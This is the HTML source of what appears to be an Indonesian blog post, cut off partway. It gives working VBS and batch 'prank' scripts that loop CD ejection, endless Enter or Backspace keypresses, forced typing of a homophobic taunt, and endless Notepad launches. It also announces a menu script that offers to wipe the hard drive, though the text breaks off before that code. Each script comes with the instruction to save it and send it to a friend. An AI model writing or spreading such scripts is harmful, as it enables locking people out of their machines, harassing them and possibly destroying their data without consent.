&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Set oWMP = CreateObject(&quot;WMPlayer.OCX.7&quot;)&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Set colCDROMs = oWMP.cdromCollection&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;do&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;if colCDROMs.Count &amp;gt;= 1 then&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;For i = 0 to colCDROMs.Count - 1&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;colCDROMs.Item(i).Eject&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Next&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;For i = 0 to colCDROMs.Count - 1&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;colCDROMs.Item(i).Eject&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Next&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;End If&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;wscript.sleep 5000&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;loop&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;- Save As .VBS terus kirim ke teman anda.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: orange; font-family: inherit;&quot;&gt;4). Yang ini script fungsinya supaya tekan enter secara simultan.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0.0001pt;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Ketik kode :&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Set wshShell = wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;do&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;wscript.sleep 100&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;wshshell.sendkeys &quot;~(enter)&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;loop&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;- Save As .VBS terus kirim ke teman anda.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: orange; font-family: inherit;&quot;&gt;5). Script ini Fungsinya untuk membuka notepad, kemudian akan mengetik pesan kita secara otomatis di notepad.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Ketik kode:&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 180000&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 10000&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Set WshShell = WScript.CreateObject(&quot;WScript.Shell&quot;)&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.Run &quot;notepad&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 100&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.AppActivate &quot;Notepad&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;Hel&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;lo &quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;, ho&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;w a&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;re &quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;you&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;? &quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;I a&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;m g&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;ood&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot; th&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;ank&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WScript.Sleep 500&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;WshShell.SendKeys &quot;s! &quot;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;- Save As .VBS terus kirim ke teman anda.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: orange; font-family: inherit;&quot;&gt;6). Membuat script VBS ini menjalankan BACKSPACE secara simultan.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Ketik Code:&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;MsgBox &quot;Let&#39;s go back a few steps&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Set wshShell =wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;do&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;wscript.sleep 100&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;wshshell.sendkeys &quot;{bs}&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;loop&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;- Save As .VBS terus kirim ke teman anda&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: orange; font-family: inherit;&quot;&gt;7). Hack keyboard sehingga temen lu dipaksa ngetik &quot; u are a gay&quot; secara simultan.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Ketik kode:&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Set wshShell = wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;do&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;wscript.sleep 100&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;wshshell.sendkeys &quot;You are a gay&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;loop&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;line-height: normal; text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;- Save As .VBS trus kirim ke teman anda&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;color: orange; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;b style=&quot;color: orange; font-family: inherit;&quot;&gt;8). Buka Notepad secara terus menerus.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;line-height: normal; text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Ketik kode:&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;@ECHO off&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;:top&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;START %SystemRoot%\system32\notepad.exe&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;GOTO top&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;- Save As .BAT terus kirim ke teman anda&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: orange; font-family: inherit;&quot;&gt;9). Script BAT yang ini bakal munculin 5 pilihan yang harus temen kalian diantaranya adalah:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0cm;&quot;&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;color: orange; font-weight: bold; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;1. Shutdown&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;
&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;line-height: normal; text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;2. Restart&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0.0001pt;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;3. Hapus HardDrive&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0.0001pt;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;4. Net Send&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;5. Menampilkan pesan, kemudian shutdown&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0.0001pt;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
